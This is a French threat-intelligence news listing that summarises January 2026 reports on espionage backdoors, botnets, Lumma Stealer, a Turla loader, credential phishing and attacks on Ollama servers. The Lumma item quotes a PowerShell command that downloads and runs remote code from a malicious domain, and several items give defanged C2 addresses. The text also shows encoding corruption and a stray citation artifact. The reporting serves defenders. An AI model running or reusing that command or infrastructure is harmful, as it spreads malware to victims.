LOTUSLITE : campagne d’espionnage ciblĂ©e via sideloading DLL, attribuĂ©e avec confiance modĂ©rĂ©e Ă  Mustang Panda

Source : Acronis Threat Research Unit (TRU). Dans un billet technique du 15 janvier 2026, Acronis TRU documente une campagne ciblĂ©e livrant un nouveau backdoor DLL, LOTUSLITE, via une archive ZIP Ă  thĂšme gĂ©opolitique liĂ©e aux relations États-Unis–Venezuela, contre des entitĂ©s gouvernementales/politiques amĂ©ricaines. Vue d’ensemble. La chaĂźne d’infection repose sur un exĂ©cutable lĂ©gitime et une DLL malveillante cachĂ©e, avec DLL sideloading pour exĂ©cuter un implant C++. LOTUSLITE communique avec un C2 Ă  IP codĂ©e en dur, offre des fonctions de tĂ©lĂ©commande (shell interactif, opĂ©rations fichiers, exfiltration basique) et met en place une persistance robuste. La campagne est jugĂ©e axĂ©e espionnage (et non financiĂšre), Ă  portĂ©e limitĂ©e mais Ă  impact potentiel Ă©levĂ© sur des cibles stratĂ©giques. ...

16 janvier 2026 Â· 4 min

Lumen/Black Lotus Labs perturbe les botnets DDoS Aisuru et Kimwolf en neutralisant 550+ serveurs C2

Selon Black Lotus Labs (Lumen Technologies), l’opĂ©rateur a observĂ© fin 2025 une croissance fulgurante du botnet Aisuru (jusqu’à >11 Tbps), puis l’apparition d’un nouveau botnet Kimwolf, alimentĂ© par l’exploitation de services de proxy rĂ©sidentiel. Lumen dĂ©crit ses actions de disruption (null-routing) ayant permis de neutraliser plus de 550 serveurs C2. — Contexte et montĂ©e en puissance — En septembre 2025, Aisuru passe d’environ 50 000 Ă  200 000 bots/jour, corrĂ©lĂ© Ă  des attaques records (>11 Tbps). Un backend C2 d’Aisuru (65.108.5[.]46) agit comme entonnoir de trafic depuis les C2 confirmĂ©s. Des connexions SSH depuis des IP canadiennes vers 194.46.59[.]169 (proxy-sdk.14emeliaterracewestroxburyma02132[.]su) suggĂšrent une interface de contrĂŽle. Le backend adopte ensuite le domaine client.14emeliaterracewestroxburyma02132[.]su. — Bifurcation vers Kimwolf — ...

16 janvier 2026 Â· 3 min

Lumma Stealer multiplie les tùches planifiées et accroßt le trafic C2 vers fileless-market[.]cc

Source: billet signĂ© par Brad Duncan (publiĂ© le 14 janvier 2026). Contexte: l’auteur documente en laboratoire un exemple d’infection Lumma Stealer prĂ©sentant un comportement post-infection inhabituel qui gĂ©nĂšre une hausse continue de trafic vers un mĂȘme domaine C2. AprĂšs l’exfiltration des donnĂ©es par Lumma Stealer, l’hĂŽte Windows infectĂ© rĂ©cupĂšre des instructions depuis un lien Pastebin (hxxps[:]//pastebin[.]com/raw/xRmmdinT) utilisĂ©es pour une infection de suivi. Le contenu Pastebin renvoie une commande PowerShell: irm hxxps[:]//fileless-market[.]cc/Notes.pdf | iex, entraĂźnant des requĂȘtes HTTPS rĂ©pĂ©tĂ©es vers hxxps[:]//fileless-market[.]cc/. ...

16 janvier 2026 Â· 2 min

Turla: analyse du loader Kazuar v3 (COM, sideloading MFC, contournements ETW/AMSI)

Dans un billet technique publiĂ© le 14 janvier 2026, l’auteur analyse la derniĂšre version du loader Kazuar v3 attribuĂ© Ă  Turla, faisant Ă©cho Ă  une campagne Ă©voquĂ©e par ESET (Ă©tiquette d’agent AGN-RR-01). Le point d’entrĂ©e est un VBScript (8RWRLT.vbs) qui crĂ©e des rĂ©pertoires sous %LOCALAPPDATA%\Programs\HP\Printer\Driver, tĂ©lĂ©charge plusieurs fichiers depuis 185.126.255[.]132, exĂ©cute un exĂ©cutable HP signĂ© (hpbprndi.exe) pour dĂ©clencher un DLL sideloading, et Ă©tablit une persistance via une clĂ© Run. Le script collecte ensuite des infos hĂŽte (OS, uptime, archi CPU, nom machine/utilisateur/domaine, liste des processus, inventaire du dossier créé) et les envoie en POST vers /requestor.php. ...

16 janvier 2026 Â· 3 min

UAT-8837 (nexus chinois) cible l’infrastructure critique nord-amĂ©ricaine et exploite un zero‑day Sitecore

Selon Cisco Talos (Threat Spotlight du 15 janv. 2026), le groupe UAT‑8837 est Ă©valuĂ© avec une confiance moyenne comme un acteur APT Ă  nexus chinois, principalement orientĂ© vers l’obtention d’accĂšs initial Ă  des organisations de grande valeur. Depuis au moins 2025, ses cibles se concentrent sur les secteurs d’infrastructure critique en AmĂ©rique du Nord. AprĂšs compromission, l’acteur dĂ©ploie surtout des outils open source pour collecter des identifiants, configurations de sĂ©curitĂ© et informations de domaine/AD, multipliant les canaux d’accĂšs. Les TTPs et l’infrastructure observĂ©es recoupent l’exploitation rĂ©cente de CVE‑2025‑53690 (zero‑day de dĂ©sĂ©rialisation ViewState dans les produits Sitecore), laissant penser qu’UAT‑8837 dispose d’exploits zero‑day. ...

16 janvier 2026 Â· 3 min

APT28 (BlueDelta) intensifie le vol d’identifiants via pages OWA/Google/VPN contre l’énergie et des think tanks

Source: SecurityAffairs, relayant un rapport de l’Insikt Group (Recorded Future). Entre fĂ©vrier et septembre 2025, le groupe liĂ© au GRU russe APT28/BlueDelta a Ă©largi ses opĂ©rations de vol d’identifiants en ciblant des personnels d’agences Ă©nergie/nuclĂ©aire en Turquie, des think tanks europĂ©ens, ainsi que des organisations en MacĂ©doine du Nord et en OuzbĂ©kistan. Les campagnes reposaient sur des fausses pages de connexion imitant Microsoft Outlook Web Access (OWA), Google et Sophos VPN, avec redirection vers les sites lĂ©gitimes aprĂšs la capture des identifiants pour rĂ©duire la dĂ©tection. Les attaquants ont privilĂ©giĂ© des infrastructures Ă  bas coĂ»t et jetables (hĂ©bergement gratuit, services de tunneling) et des leurres PDF lĂ©gitimes (publications du Gulf Research Center et de l’EcoClimate Foundation/ECCO) pour renforcer la crĂ©dibilitĂ© et contourner les contrĂŽles e-mail. ...

14 janvier 2026 Â· 3 min

Campagne caritative piégée vise des responsables ukrainiens avec le backdoor PluggyApe

Selon BleepingComputer, entre octobre et dĂ©cembre 2025, des officiels des Forces de dĂ©fense ukrainiennes ont Ă©tĂ© visĂ©s par une campagne Ă  thĂšme caritatif qui a livrĂ© un malware de type backdoor, nommĂ© PluggyApe. 🎯 Campagne PluggyApe visant les Forces de dĂ©fense ukrainiennes Entre octobre et dĂ©cembre 2025, des responsables des Forces de dĂ©fense ukrainiennes ont Ă©tĂ© ciblĂ©s par une campagne malveillante se faisant passer pour des initiatives caritatives. Selon un rapport de :contentReference[oaicite:0]{index=0}, les attaques sont attribuĂ©es avec un niveau de confiance moyen Ă  un groupe de menace russe connu sous les noms Void Blizzard et Laundry Bear. ...

14 janvier 2026 Â· 3 min

La plateforme « Penguin » vend des kits de pig‑butchering, des PII et des comptes volĂ©s

Selon GBHackers Security, l’industrialisation des escroqueries « pig‑butchering » a atteint un point critique, portĂ©e par un Ă©cosystĂšme Pig‑Butchering‑as‑a‑Service (PBaaS) qui se dĂ©veloppe en Asie du Sud‑Est. Un marchĂ© PBaaS tentaculaire propose des services complets: plates‑formes d’arnaque clĂ©s en main, identitĂ©s volĂ©es, cartes SIM pré‑enregistrĂ©es, applications mobiles, infrastructures de paiement et crĂ©ation de sociĂ©tĂ©s Ă©crans. đŸ§© Dans ce contexte, une nouvelle plateforme nommĂ©e « Penguin » commercialise des kits de pig‑butchering, des donnĂ©es personnelles (PII) et des comptes volĂ©s, facilitant l’exĂ©cution d’arnaques complexes. ...

14 janvier 2026 Â· 2 min

BlackCat diffuse des malwares via de faux sites Notepad++ optimisés pour les moteurs de recherche

Selon GBHackers Security, une campagne sophistiquĂ©e attribuĂ©e au groupe criminel BlackCat a Ă©tĂ© mise au jour par CNCERT et Microstep Online, visant des internautes via des sites factices de tĂ©lĂ©chargement Notepad++ optimisĂ©s pour les moteurs de recherche. La campagne s’appuie sur des faux sites Notepad++ mis en avant par des techniques de SEO poisoning afin de tromper les utilisateurs et les pousser Ă  tĂ©lĂ©charger des paquets logiciels piĂ©gĂ©s. Une fois exĂ©cutĂ©s, ces paquets dĂ©ploient des chevaux de Troie Ă  porte dĂ©robĂ©e destinĂ©s Ă  l’exfiltration et au vol de donnĂ©es 🎯. L’opĂ©ration est dĂ©crite comme coordonnĂ©e et sophistiquĂ©e, ciblant des utilisateurs « grand public » via la recherche en ligne. ...

10 janvier 2026 Â· 2 min

GreyNoise alerte sur deux campagnes visant les LLM: SSRF sur Ollama et reconnaissance massive d’endpoints

Source: GreyNoise Labs — Dans un billet de recherche s’appuyant sur une infrastructure honeypot Ollama, GreyNoise rapporte 91 403 sessions d’attaque (octobre 2025–janvier 2026) et dĂ©taille deux campagnes distinctes, corroborant et Ă©tendant les constats de Defused. Un SITREP avec IOCs a Ă©tĂ© transmis aux clients. ‱ Campagne SSRF (oct. 2025–janv. 2026) 🚹: exploitation de SSRF pour forcer des connexions sortantes vers l’infrastructure des attaquants. Deux vecteurs ciblĂ©s: Ollama (model pull) via injection d’URL de registre malveillantes et Twilio SMS webhook (MediaUrl) provoquant des connexions sortantes. Forte poussĂ©e Ă  NoĂ«l (1 688 sessions en 48 h). Utilisation de l’infrastructure OAST de ProjectDiscovery pour valider les callbacks SSRF. Un JA4H unique (po11nn060000
) dans 99% des attaques indique un outillage commun, probablement Nuclei; 62 IPs dans 27 pays, empreintes cohĂ©rentes suggĂ©rant des VPS plutĂŽt qu’un botnet. Évaluation: probablement chercheurs/bug bounty « grey-hat ». ...

10 janvier 2026 Â· 3 min
Derniùre mise à jour le: 16 Feb 2026 📝